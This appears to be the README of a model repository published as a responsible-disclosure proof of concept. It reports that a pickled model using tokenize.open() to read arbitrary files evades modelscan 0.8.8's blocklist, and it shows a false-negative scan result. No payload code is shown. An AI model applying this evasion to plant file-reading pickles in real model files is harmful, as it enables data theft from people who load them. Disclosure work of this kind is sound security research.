README.md

---
license: mit
tags:
- security-research
- modelscan-bypass
---

# modelscan-bypass-tokenize-open

## Security Research — Modelscan Bypass PoC

**Severity**: HIGH

**Module**: `tokenize`

**Description**: File open via tokenize.open() — bypasses builtins.open block

**Impact**: Opens any file for reading. Alternative to builtins.open which is blocked.

## Modelscan Result

```
$ modelscan scan -p pytorch_model.bin
No issues found! ✅ (FALSE NEGATIVE)
```

**Tested against**: modelscan 0.8.8 (latest)

## How It Works

The pickle file uses `tokenize` which is NOT in modelscan's unsafe_globals blocklist.
When loaded via `torch.load()` or `pickle.loads()`, it executes the payload.

## Responsible Disclosure

This PoC is part of responsible security research submitted via Huntr MFV program
to help ProtectAI improve modelscan's detection capabilities.